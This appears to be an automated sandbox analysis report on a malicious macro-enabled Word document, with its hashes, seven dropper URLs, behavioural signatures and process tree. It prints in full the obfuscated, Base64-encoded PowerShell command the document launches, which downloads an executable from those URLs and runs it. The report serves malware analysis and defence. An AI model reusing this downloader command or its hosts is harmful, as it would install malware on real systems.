Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2024 19:05

General

  • Target

    ee3e146b06950bbae003bb0fc0f93a1c_JaffaCakes118.doc

  • Size

    161KB

  • MD5

    ee3e146b06950bbae003bb0fc0f93a1c

  • SHA1

    cff3bfade3d780dc12e8db53207a8a60d2edceab

  • SHA256

    79d2bc5dfbd06aa3a4c4836e6d69ecea6627d98b1ed0093afe0e2874b2478512

  • SHA512

    4e3097790f596b3ae5a40a76d38589621f7cbc317cef1fbc10ada27cce371155bead4dd6e39994afe35446533d5b8068c77c09038df97f6b5f0cd80824ee3dc3

  • SSDEEP

    1536:+Yz6EYvgtCdOqbIoPaUtSPzPwFI7HvPxq4twtdARD3bNqfNpu39IId5a6XP3Mg8P:fR1qf69xak3MgxWO3O5w5ksnXFYcy

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://pagearrow.com/wordpress/xF/

exe.dropper

http://yzlangfeng.com/wp-includes/2/

exe.dropper

https://codepog.com/wp-includes/vK/

exe.dropper

https://aravindhherbalstore.com/iyvdv/c/

exe.dropper

https://alltopgame.com/wp-content/Qu/

exe.dropper

https://st47.net/wp-content/languages/OH/

exe.dropper

http://xiaoxiangkeji.top/wp-content/Rrb/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee3e146b06950bbae003bb0fc0f93a1c_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1660
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABRAGEAYQB2AHIAYwBjAD0AKAAnAEYAbgAnACsAKAAnAG0AOQAxAGQAJwArACcAaQAnACkAKQA7AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgBWADoAdQBTAGUAcgBQAHIAbwBmAGkAbABFAFwATgBvAEIAVgAzADYAVgBcAEwATAB6AEEATgA0ADUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIAZQBDAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAHUAUgBJAFQAYABZAFAAUgBvAGAAVABgAE8AYABDAE8AbAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzADEAMgAnACsAJwAsACcAKwAnACAAdAAnACkAKwAoACcAbAAnACsAJwBzADEAMQAsACAAJwApACsAJwB0AGwAJwArACcAcwAnACkAOwAkAFgAawBjADAAMwBzAHMAIAA9ACAAKAAoACcAVwB6ACcAKwAnAG8AOAByAHcAaAAnACkAKwAnAGoAJwArACcAMwAnACkAOwAkAFkAdgBkAG0AZwBkAHIAPQAoACgAJwBJADMAJwArACcAcwAnACkAKwAoACcAOAAnACsAJwBtAHIAbAAnACkAKQA7ACQAQwBtADkAbwA3ADQAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAHcAJwArACcAOQA1AE4AJwApACsAJwBvAGIAJwArACgAJwB2ADMAJwArACcANgAnACsAJwB2AHcAOQA1AEwAbAB6AGEAbgAnACkAKwAnADQAJwArACcANQAnACsAKAAnAHcAOQAnACsAJwA1ACcAKQApAC0AQwByAEUAUABMAGEAQwBlACAAIAAoACcAdwAnACsAJwA5ADUAJwApACwAWwBjAEgAYQByAF0AOQAyACkAKwAkAFgAawBjADAAMwBzAHMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABKAHAAcwB4AHkAbQBkAD0AKAAoACcARAAnACsAJwB6AHAAJwApACsAKAAnADgAJwArACcAdABiADQAJwApACkAOwAkAE0ANQBfAGQAOQBvAHEAPQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAHQAOwAkAEgAdgA4AGkAaAAzAGMAPQAoACgAJwBoAHQAdABwACcAKwAnADoAJwApACsAKAAnAC8ALwBwACcAKwAnAGEAJwArACcAZwBlAGEAcgByACcAKwAnAG8AdwAuAGMAbwBtAC8AdwAnACkAKwAoACcAbwByACcAKwAnAGQAcAByACcAKQArACgAJwBlAHMAcwAnACsAJwAvACcAKQArACgAJwB4ACcAKwAnAEYALwAnACkAKwAoACcAKgBoAHQAJwArACcAdAAnACkAKwAoACcAcAAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAHkAegAnACsAJwBsAGEAJwArACcAbgAnACsAKAAnAGcAJwArACcAZgBlAG4AJwApACsAJwBnAC4AJwArACgAJwBjACcAKwAnAG8AbQAnACkAKwAoACcALwB3ACcAKwAnAHAALQBpAG4AJwApACsAKAAnAGMAbAB1AGQAJwArACcAZQBzAC8AJwApACsAKAAnADIAJwArACcALwAqAGgAJwApACsAJwB0ACcAKwAoACcAdABwACcAKwAnAHMAOgAvACcAKwAnAC8AYwAnACsAJwBvAGQAZQBwAG8AJwApACsAKAAnAGcAJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3AHAAJwArACcALQAnACsAJwBpACcAKwAnAG4AYwBsAHUAZABlACcAKQArACgAJwBzAC8AJwArACcAdgBLAC8AKgAnACkAKwAoACcAaAB0ACcAKwAnAHQAcABzACcAKwAnADoALwAnACkAKwAoACcALwBhACcAKwAnAHIAYQB2ACcAKwAnAGkAbgBkACcAKwAnAGgAaABlAHIAJwApACsAKAAnAGIAYQBsACcAKwAnAHMAdABvAHIAJwApACsAJwBlACcAKwAoACcALgBjACcAKwAnAG8AbQAnACsAJwAvAGkAJwApACsAKAAnAHkAdgAnACsAJwBkAHYALwBjAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAJwArACcAcAAnACsAJwBzADoALwAvACcAKwAnAGEAbABsAHQAbwBwAGcAYQBtACcAKwAnAGUALgBjAG8AJwArACcAbQAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAoACcAYwBvACcAKwAnAG4AJwApACsAJwB0ACcAKwAnAGUAJwArACgAJwBuACcAKwAnAHQAJwArACcALwBRAHUALwAqACcAKQArACcAaAB0ACcAKwAoACcAdABwACcAKwAnAHMAOgAvACcAKwAnAC8AJwArACcAcwAnACsAJwB0ADQANwAuAG4AZQB0AC8AdwBwAC0AJwApACsAKAAnAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgB0ACcAKwAnAC8AbAAnACsAJwBhACcAKQArACgAJwBuAGcAJwArACcAdQBhAGcAZQAnACkAKwAoACcAcwAnACsAJwAvAE8AJwApACsAKAAnAEgALwAqACcAKwAnAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AeAAnACkAKwAoACcAaQBhAG8AeAAnACsAJwBpACcAKwAnAGEAJwArACcAbgAnACsAJwBnAGsAZQBqAGkALgB0AG8AcAAvAHcAcAAtAGMAJwApACsAKAAnAG8AbgAnACsAJwB0AGUAJwApACsAKAAnAG4AdAAnACsAJwAvAFIAcgBiAC8AJwApACkALgAiAHMAUABsAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVgA4AGUAcwBvADcAZwA9ACgAKAAnAEwAeAA0ACcAKwAnAHEAJwApACsAKAAnAGwAJwArACcAMABtACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASQBuAHIAOQBsAHMAaAAgAGkAbgAgACQASAB2ADgAaQBoADMAYwApAHsAdAByAHkAewAkAE0ANQBfAGQAOQBvAHEALgAiAEQAbwBgAHcAbgBsAE8AQQBkAGAARgBJAGwAZQAiACgAJABJAG4AcgA5AGwAcwBoACwAIAAkAEMAbQA5AG8ANwA0AG4AKQA7ACQAUAA5AGkANAAyAGUAOAA9ACgAJwBNAGgAJwArACcAaAAnACsAKAAnAHIAeQAnACsAJwB1AHUAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAQwBtADkAbwA3ADQAbgApAC4AIgBMAGAARQBOAGcAdABIACIAIAAtAGcAZQAgADIANQAzADcAOQApACAAewAuACgAJwBJAG4AdgAnACsAJwBvAGsAZQAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACgAJABDAG0AOQBvADcANABuACkAOwAkAFQAZABwAG4ANABmAHIAPQAoACgAJwBHAGgAJwArACcAYQAnACkAKwAnAHUAJwArACgAJwB4ACcAKwAnAHYAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQATQBsAHcANABfAGIAegA9ACgAKAAnAE4AYgBnAHkAJwArACcAMQAnACkAKwAnAHYANwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE4AcwB1ADcAOQB1ADQAPQAoACcAVAB1ACcAKwAnAHIAJwArACgAJwA5ACcAKwAnADcAYgA2ACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2844

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\CabE93.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\TarEB5.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      2205355cad3b07e3d5f4bc6abb4039fc

      SHA1

      73ba6e3adf50a4f647ef1cd2b82407140e9ad3dd

      SHA256

      6560b7ada9451c2a372b9902c22a0914e7367ee808f41b3565e6ad5be3d34d27

      SHA512

      a50fc3cae85446720863abacbe2fd1fc84744cecad470e712492c48d3a35a00dfa8d0bb7cc63bc200abd478e746b499adc172f395ea1d01804ab2fe4161735a5

    • memory/2164-31-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-59-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-7-0x0000000006030000-0x0000000006130000-memory.dmp

      Filesize

      1024KB

    • memory/2164-10-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-8-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-9-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-23-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-20-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-27-0x0000000005D80000-0x0000000005E80000-memory.dmp

      Filesize

      1024KB

    • memory/2164-21-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-19-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-18-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-17-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-16-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-14-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-15-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-13-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-12-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-11-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-35-0x0000000005D80000-0x0000000005E80000-memory.dmp

      Filesize

      1024KB

    • memory/2164-34-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-0-0x000000002FCF1000-0x000000002FCF2000-memory.dmp

      Filesize

      4KB

    • memory/2164-111-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2164-6-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-41-0x0000000005D80000-0x0000000005E80000-memory.dmp

      Filesize

      1024KB

    • memory/2164-37-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-38-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-28-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-42-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-40-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-36-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-39-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-112-0x000000007120D000-0x0000000071218000-memory.dmp

      Filesize

      44KB

    • memory/2164-30-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-50-0x000000007120D000-0x0000000071218000-memory.dmp

      Filesize

      44KB

    • memory/2164-51-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-52-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-53-0x0000000005D80000-0x0000000005E80000-memory.dmp

      Filesize

      1024KB

    • memory/2164-54-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-55-0x0000000005D80000-0x0000000005E80000-memory.dmp

      Filesize

      1024KB

    • memory/2164-56-0x0000000005D80000-0x0000000005E80000-memory.dmp

      Filesize

      1024KB

    • memory/2164-29-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-5-0x0000000000400000-0x0000000000500000-memory.dmp

      Filesize

      1024KB

    • memory/2164-2-0x000000007120D000-0x0000000071218000-memory.dmp

      Filesize

      44KB

    • memory/2164-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2844-49-0x0000000002810000-0x0000000002818000-memory.dmp

      Filesize

      32KB

    • memory/2844-48-0x000000001B4B0000-0x000000001B792000-memory.dmp

      Filesize

      2.9MB